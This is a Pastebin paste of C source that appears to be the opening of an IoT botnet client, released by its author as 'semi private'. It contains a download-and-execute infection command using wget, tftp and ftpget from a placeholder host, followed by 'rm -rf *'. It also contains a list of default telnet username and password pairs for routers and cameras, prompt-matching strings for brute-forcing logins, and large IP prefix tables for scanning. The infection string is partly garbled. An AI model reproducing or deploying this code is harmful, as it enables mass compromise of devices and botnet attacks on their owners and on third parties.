Advertisement
Condomenium

iLLSeCBuild3.c

Jun 3rd, 2017
401
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 109.91 KB | None | 0 0
  1. // Made by iLLSeC
  2. // This shit is good af
  3. // Released but still semi private
  4. // Dont talk shit. this took a long time
  5. // server side being released soon
  6. // '####:'##:::::::'##::::::::'######::'########::'######::
  7. // . ##:: ##::::::: ##:::::::'##... ##: ##.....::'##... ##:
  8. // : ##:: ##::::::: ##::::::: ##:::..:: ##::::::: ##:::..::
  9. // : ##:: ##::::::: ##:::::::. ######:: ######::: ##:::::::
  10. // : ##:: ##::::::: ##::::::::..... ##: ##...:::: ##:::::::
  11. // : ##:: ##::::::: ##:::::::'##::: ##: ##::::::: ##::: ##:
  12. // '####: ########: ########:. ######:: ########:. ######::
  13. // ....::........::........:::......:::........:::......:::
  14.  
  15.  
  16. //Reporters
  17. #define PR_SET_NAME 15
  18. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
  19. #define PAD_RIGHT 1
  20. #define PAD_ZERO 2
  21. #define PRINT_BUF_LEN 12
  22. #define CMD_IAC 255
  23. #define CMD_WILL 251
  24. #define CMD_WONT 252
  25. #define CMD_DO 253
  26. #define CMD_DONT 255
  27. #define OPT_SGA 3
  28. #define STD2_STRING "dts"
  29. #define STD2_SIZE 51
  30. #define BUFFER_SIZE 1024
  31.  
  32. //Illucides
  33.  
  34. #include <stdlib.h>
  35. #include <stdarg.h>
  36. #include <stdio.h>
  37. #include <sys/socket.h>
  38. #include <sys/types.h>
  39. #include <netinet/in.h>
  40. #include <arpa/inet.h>
  41. #include <netdb.h>
  42. #include <signal.h>
  43. #include <strings.h>
  44. #include <string.h>
  45. #include <sys/utsname.h>
  46. #include <unistd.h>
  47. #include <fcntl.h>
  48. #include <errno.h>
  49. #include <netinet/ip.h>
  50. #include <netinet/udp.h>
  51. #include <netinet/tcp.h>
  52. #include <sys/wait.h>
  53. #include <sys/ioctl.h>
  54. #include <net/if.h>
  55. #include <pthread.h>
  56.  
  57.  
  58. unsigned char *commServer[] =
  59. {
  60. "ip:port"
  61. };
  62.  
  63. //Updated user agents ;)
  64. //#iLLSeC
  65.  
  66. char *useragents[] = {
  67. "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
  68. "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
  69. "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
  70. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
  71. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
  72. "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
  73. "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
  74. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
  75. "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
  76. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
  77. "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
  78. "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
  79. "wii libnup/1.0",
  80. "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
  81. "PSP (PlayStation Portable); 2.00",
  82. "Bunjalloo/0.7.6(Nintendo DS;U;en)",
  83. "Doris/1.15 [en] (Symbian)",
  84. "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  85. "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",
  86. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
  87. "Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",
  88. "Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",
  89. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
  90. "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
  91. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",
  92. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
  93. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",
  94. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
  95. "SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  96. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
  97. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",
  98. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
  99. "MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",
  100. "Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
  101. "Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",
  102. "MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  103. };
  104.  
  105. int initConnection();
  106. int getBogos(unsigned char *bogomips);
  107. int getCores();
  108. int getCountry(unsigned char *buf, int bufsize);
  109. void makeRandomStr(unsigned char *buf, int length);
  110. int sockprintf(int sock, char *formatStr, ...);
  111. char *inet_ntoa(struct in_addr in);
  112.  
  113. int mainCommSock = 0, currentServer = -1, gotIP = 0;
  114. uint32_t *pids;
  115. uint32_t scanPid;
  116. uint64_t numpids = 0;
  117. struct in_addr ourIP;
  118. struct in_addr ourPublicIP;
  119. unsigned char macAddress[6] = {0};
  120.  
  121. //Infection bullshit
  122.  
  123. char *infect = "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget http://ip/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp ip -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g ip; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ip ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n";"; chmod 23 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g ip; chmod 23 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ip ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n";
  124. char *usernames[] = {
  125.  
  126. "root\0", //root:xc3511
  127. "root\0", //root:vizxv
  128. "root\0", //root:admin
  129. "admin\0", //admin:admin
  130. "root\0", //root:888888
  131. "root\0", //root:xmhdipc
  132. "root\0", //root:default
  133. "root\0", //root:juantech
  134. "root\0", //root:123456
  135. "root\0", //root:54321
  136. "support\0", //support:support
  137. "root\0", //root:(none)
  138. "admin\0", //admin:password
  139. "root\0", //root:root
  140. "root\0", //root:12345
  141. "user\0", //user:user
  142. "admin\0", //admin:(none)
  143. "root\0", //root:pass
  144. "admin\0", //admin:admin1234
  145. "root\0", //root:1111
  146. "admin\0", //admin:smcadmin
  147. "admin\0", //admin:1111
  148. "root\0", //root:666666
  149. "root\0", //root:password
  150. "root\0", //root:1234
  151. "root\0", //root:klv123
  152. "Administrator\0", //Administrator:admin
  153. "service\0", //service:service
  154. "supervisor\0", //supervisor:supervisor
  155. "guest\0", //guest:guest
  156. "guest\0", //guest:12345
  157. "guest\0", //guest:12345
  158. "admin1\0", //admin1:password
  159. "administrator\0", //administrator:1234
  160. "666666\0", //666666:666666
  161. "888888\0", //888888:888888
  162. "ubnt\0", //ubnt:ubnt
  163. "klv1234\0", //root:klv1234
  164. "Zte521\0", //root:Zte521
  165. "hi3518\0", //root:hi3518
  166. "jvbzd\0", //root:jvbzd
  167. "anko\0", //root:anko
  168. "zlxx\0", //root:zlxx
  169. "7ujMko0vizxv\0", //root:7ujMko0vizxv
  170. "7ujMko0admin\0", //root:7ujMko0admin
  171. "system\0", //root:system
  172. "ikwb\0", //root:ikwb
  173. "dreambox\0", //root:dreambox
  174. "user\0", //root:user
  175. "realtek\0", //root:realtek
  176. "00000000\0", //root:00000000
  177. "1111111\0", //admin:1111111
  178. "1234\0", //admin:1234
  179. "12345\0", //admin:12345
  180. "54321\0", //admin:54321
  181. "123456\0", //admin:123456
  182. "7ujMko0admin\0", //admin:7ujMko0admin
  183. "1234\0", //admin:1234
  184. "pass\0", //admin:pass
  185. "meinsm\0", //admin:meinsm
  186. "tech\0", //tech:tech
  187. "fucker\0", //mother:fucker
  188. };
  189.  
  190. char *passwords[] = {
  191.  
  192. "xc3511\0", //root:xc3511
  193. "vizxv\0", //root:vizxv
  194. "admin\0", //root:admin
  195. "admin\0", //admin:admin
  196. "888888\0", //root:888888
  197. "xmhdipc\0", //root:xmhdipc
  198. "default\0", //root:default
  199. "juantech\0", //root:juantech
  200. "123456\0", //root:123456
  201. "54321\0", //root:54321
  202. "support\0", //support:support
  203. "\0", //root:(none)
  204. "password\0", //admin:password
  205. "root\0", //root:root
  206. "12345\0", //root:12345
  207. "user\0", //user:user
  208. "\0", //admin:(none)
  209. "pass\0", //root:pass
  210. "admin1234\0", //admin:admin1234
  211. "1111\0", //root:1111
  212. "smcadmin\0", //admin:smcadmin
  213. "1111\0", //admin:1111
  214. "666666\0", //root:666666
  215. "password\0", //root:password
  216. "1234\0", //root:1234
  217. "klv123\0", //root:klv123
  218. "admin\0", //Administrator:admin
  219. "service\0", //service:service
  220. "supervisor\0", //supervisor:supervisor
  221. "guest\0", //guest:guest
  222. "12345\0", //guest:12345
  223. "12345\0", //guest:12345
  224. "password\0", //admin1:password
  225. "1234\0", //administrator:1234
  226. "666666\0", //666666:666666
  227. "888888\0", //888888:888888
  228. "ubnt\0", //ubnt:ubnt
  229. "klv1234\0", //root:klv1234
  230. "Zte521\0", //root:Zte521
  231. "hi3518\0", //root:hi3518
  232. "jvbzd\0", //root:jvbzd
  233. "anko\0", //root:anko
  234. "zlxx\0", //root:zlxx
  235. "7ujMko0vizxv\0", //root:7ujMko0vizxv
  236. "7ujMko0admin\0", //root:7ujMko0admin
  237. "system\0", //root:system
  238. "ikwb\0", //root:ikwb
  239. "dreambox\0", //root:dreambox
  240. "user\0", //root:user
  241. "realtek\0", //root:realtek
  242. "00000000\0", //root:00000000
  243. "1111111\0", //admin:1111111
  244. "1234\0", //admin:1234
  245. "12345\0", //admin:12345
  246. "54321\0", //admin:54321
  247. "123456\0", //admin:123456
  248. "7ujMko0admin\0", //admin:7ujMko0admin
  249. "1234\0", //admin:1234
  250. "pass\0", //admin:pass
  251. "meinsm\0", //admin:meinsm
  252. "tech\0", //tech:tech
  253. "fucker\0", //mother:fucker
  254.  
  255. };
  256. char* tmpdirs[] = {"/dev/netslink/", "/tmp/", "/var/", "/dev/", "/var/run/", "/dev/shm/", "/mnt/", "/boot/", "/usr/", (char*) 0};
  257. char* advances[] = {":", "ogin", "sername", "assword", "pass", "dvrdvs", (char*)0};
  258. char* fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
  259. char* successes[] = {"busybox", "$", "#", "shelled", (char*)0};
  260. char* infected[] = {"ILLSEC"};
  261. char *infectedmessage = "ILLSEC";
  262. char* advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
  263. int oldranges[] = {1,1,1,1,1,1,101,101,101,103,103,103,103,103,105,106,106,109,109,109,109,109,111,112,112,112,112,112,112,113,113,113,114,114,115,115,115,115,117,117,117,118,118,118,118,118,118,118,118,119,119,119,119,120,120,120,121,121,121,121,121,121,122,122,122,122,122,122,122,122,122,122,123,123,124,124,124,124,124,124,125,125,125,125,125,125,125,125,128,128,131,131,131,132,138,14,14,14,14,14,14,14,14,14,14,14,14,140,141,148,151,162,163,165,165,166,166,166,166,166,166,166,166,167,168,173,173,173,174,175,175,175,175,175,175,175,175,176,176,177,177,177,177,177,177,177,177,178,178,178,179,179,179,179,180,181,181,181,182,182,182,182,182,182,182,182,185,185,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,187,187,187,187,188,188,189,189,189,189,189,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,191,191,191,191,191,191,191,191,191,191,191,191,191,192,193,193,196,196,197,198,2,2,2,2,200,200,200,200,201,201,201,201,201,201,201,201,201,201,202,202,202,202,202,202,202,203,203,203,203,203,203,203,203,203,203,206,209,209,210,210,210,210,210,210,210,210,210,210,210,210,211,211,211,211,211,211,211,211,211,211,211,211,211,211,212,212,212,213,213,213,213,213,213,213,217,218,218,219,219,219,220,220,220,220,220,220,221,221,221,221,221,222,222,222,222,222,222,223,223,223,223,24,24,27,27,27,31,31,31,31,31,31,31,36,37,37,37,37,37,37,37,37,41,41,41,41,41,41,42,42,43,43,45,45,46,46,46,46,46,46,46,46,49,49,49,49,5,5,5,5,5,5,5,5,50,52,58,58,58,58,58,59,59,59,59,59,59,60,61,61,61,61,61,61,61,61,61,61,61,61,61,61,62,64,66,68,69,70,71,72,72,74,75,77,77,77,77,78,78,78,78,78,78,79,79,79,8,80,80,80,80,80,80,80,80,80,81,81,81,81,82,82,82,82,83,83,83,83,83,83,83,83,83,84,84,84,84,85,85,85,85,85,85,85,86,86,86,86,87,87,87,88,88,88,88,88,88,88,88,89,89,89,89,89,89,90,91,91,91,91,91,91,91,92,93,93,93,94,94,94,94,94,95,95,95,95,95,95,95,95,95,95,96,98,98};
  264. int oldranges2[] = {10,176,213,232,245,4,108,231,51,193,206,25,43,62,98,105,240,161,197,232,60,86,69,163,169,219,220,67,76,11,198,53,69,99,127,160,91,93,123,16,17,128,173,175,217,220,35,36,37,194,203,92,93,237,29,51,120,121,137,58,65,73,128,160,170,178,199,2,3,52,53,54,108,200,105,106,107,119,128,28,107,127,132,24,25,26,27,7,0,46,0,108,72,248,94,160,162,167,168,174,175,177,185,191,201,33,48,93,64,204,100,254,172,132,229,130,141,154,161,241,248,251,78,142,167,238,239,255,58,126,192,201,224,226,228,231,232,121,96,113,19,22,35,69,70,87,99,136,150,208,184,40,56,57,180,138,141,226,52,65,68,70,71,72,75,76,69,87,103,106,112,113,114,115,116,117,118,119,128,129,130,133,134,135,138,148,15,155,177,178,179,183,192,194,195,201,215,218,219,226,227,233,235,236,237,242,249,251,39,46,54,56,57,58,59,60,61,62,65,67,92,95,109,50,61,95,243,3,114,149,55,96,98,121,15,155,174,175,176,178,179,252,254,40,43,48,49,50,80,194,197,199,203,241,26,31,37,6,81,83,84,98,154,34,68,205,44,246,144,227,232,235,38,103,161,205,23,124,179,222,230,240,49,55,67,71,77,103,137,151,31,41,44,62,109,123,223,236,237,238,242,249,252,253,192,102,225,102,105,111,119,16,181,213,216,217,91,92,93,105,119,195,208,216,229,232,238,239,245,254,36,37,44,103,156,179,164,190,230,232,250,46,85,57,56,65,149,233,240,127,149,66,67,69,93,145,164,166,210,7,110,170,172,174,211,212,237,242,95,99,2,31,0,1,126,135,146,163,186,23,42,8,96,1,132,143,151,158,221,77,98,143,162,34,65,74,82,115,61,239,245,242,64,149,19,29,39,42,44,48,63,136,144,145,213,11,137,140,141,199,81,82,83,167,221,137,140,187,213,244,11,120,25,30,94,95,175,148,152,177,183,230,234,235,251,32,36,7,72,78,85,176,19,108,12,36,33,87,17,219,59,151,108,209,35,94,139,158,186,188,189,61,126,142,49,40,188,221,242,249,250,54,78,82,85,19,220,45,74,151,52,53,55,11,12,132,174,22,221,233,237,24,124,22,237,238,104,105,109,173,64,95,99,110,122,53,99,117,15,239,147,204,225,234,247,248,249,28,142,200,207,212,22,248,157,102,135,137,140,158,200,221,92,100,103,190,215,29,40,56,70,152,210,227,244,37,39,46,53,69,9,30,124,207};
  265. int rangesA[] = {1,101,103,109,112,115,118,121,122,124,125,128,131,14,173,175,176,178,180,181,182,186,188,189,196,202,203,210,211,212,216,220,27,31,37,41,43,45,46,49,5,50,59,61,62,77,78,79,80,82,83,85,87,88,89,91,93,94,95};
  266. int rangesB1[] = {1,1,101,103,103,103,103,103,103,103,103,103,103,103,103,103,103,109,109,111,112,115,118,118,120,121,122,122,122,124,124,125,125,125,128,131,14,14,14,14,14,14,14,14,14,14,14,167,173,175,176,176,178,179,180,181,182,182,182,182,186,186,186,186,186,186,186,186,188,188,189,189,189,190,196,202,202,203,203,210,211,211,212,212,213,216,220,27,27,31,31,31,31,31,37,37,37,41,41,41,43,43,43,43,45,45,45,45,45,46,46,46,46,49,49,5,5,5,50,50,59,59,61,61,61,62,77,77,77,77,78,78,78,78,79,80,80,82,82,82,82,83,83,83,85,85,85,85,85,85,87,88,88,88,88,88,88,88,88,88,89,89,91,93,93,93,94,94,95,95,95,95,95,95,95};
  267. int rangesB2[] = {10,70,108,193,195,198,203,206,214,220,242,30,35,43,49,55,62,197,86,69,169,160,173,35,237,137,178,53,54,107,119,107,132,24,0,72,160,162,167,168,174,175,177,185,191,201,27,142,255,201,121,96,136,184,180,226,52,68,71,75,112,114,117,177,227,236,251,67,243,3,149,169,55,43,44,44,62,109,150,213,216,229,103,156,250,51,93,0,1,135,163,23,42,8,1,143,158,143,65,82,230,239,245,252,115,120,121,127,252,39,42,48,63,144,145,105,137,141,203,233,120,95,177,7,85,176,108,209,35,94,139,186,188,189,126,250,82,52,53,55,71,12,221,24,104,105,109,173,95,99,117,147,204,225,234,247,248,249,251,3,200,248,140,100,103,190,29,70,152,210,37,46,53,69,9};
  268. int rangesC1[] = {1,1,101,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,109,109,111,112,115,118,118,118,118,118,118,120,121,122,122,122,122,124,124,125,125,125,128,131,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,167,173,175,175,176,176,178,179,180,181,182,182,182,182,182,182,182,182,186,186,186,186,186,186,186,186,186,186,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,189,189,189,190,196,202,202,202,202,202,202,202,202,202,203,203,210,211,211,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,213,216,220,220,27,27,27,27,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,37,37,37,37,37,37,37,41,41,41,41,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,45,45,45,45,45,45,45,45,45,45,45,45,45,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,49,49,49,49,49,49,49,49,49,49,5,5,5,5,5,5,5,5,5,50,50,59,59,59,59,61,61,61,61,61,61,62,77,77,77,77,77,77,77,77,77,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,79,79,79,79,80,80,80,80,82,82,82,82,82,82,82,82,83,83,83,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,87,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,89,89,91,93,93,93,93,93,93,94,94,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95};
  269. int rangesC2[] = {10,70,108,193,195,195,198,198,198,203,203,203,206,214,214,220,242,242,242,30,30,30,35,35,43,49,55,62,62,62,197,86,69,169,160,173,173,173,173,173,35,237,137,178,178,53,54,107,119,107,132,24,0,72,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,167,167,167,168,168,168,174,174,174,174,174,174,174,175,175,175,175,175,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,185,185,185,185,185,185,185,185,185,185,185,185,191,191,191,191,191,201,27,142,255,201,201,121,96,136,184,180,226,52,52,68,71,71,75,75,75,112,114,117,177,227,236,251,67,67,67,243,243,243,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,149,169,55,43,44,44,44,44,44,44,44,44,44,62,109,150,213,216,229,103,103,103,103,103,156,156,156,156,156,156,156,156,156,156,156,156,156,250,51,93,93,0,0,0,1,135,163,163,163,23,23,23,23,23,23,23,23,23,23,42,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,1,1,143,158,158,158,158,143,65,82,82,230,230,230,230,239,239,239,239,245,245,245,245,245,245,245,245,245,245,245,245,245,245,245,245,252,252,252,252,252,115,115,120,120,121,121,121,127,127,252,252,252,252,39,42,42,42,42,48,48,48,48,48,48,48,48,63,63,63,63,144,144,144,144,144,144,145,145,145,145,105,137,141,141,141,141,141,141,141,203,233,120,95,95,95,177,7,7,7,7,85,176,108,108,209,35,35,35,35,94,94,139,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,126,126,126,126,250,250,250,82,52,52,53,53,53,55,55,71,12,221,24,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,109,109,109,109,173,173,173,173,173,173,173,173,173,95,95,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,117,147,147,147,147,147,204,225,225,225,225,225,225,225,225,225,225,234,234,234,234,234,234,234,234,234,234,234,234,234,234,234,234,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,251,3,200,248,140,100,100,100,100,103,190,29,70,152,152,152,152,152,210,37,37,37,37,37,37,37,46,46,53,53,53,69,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9};
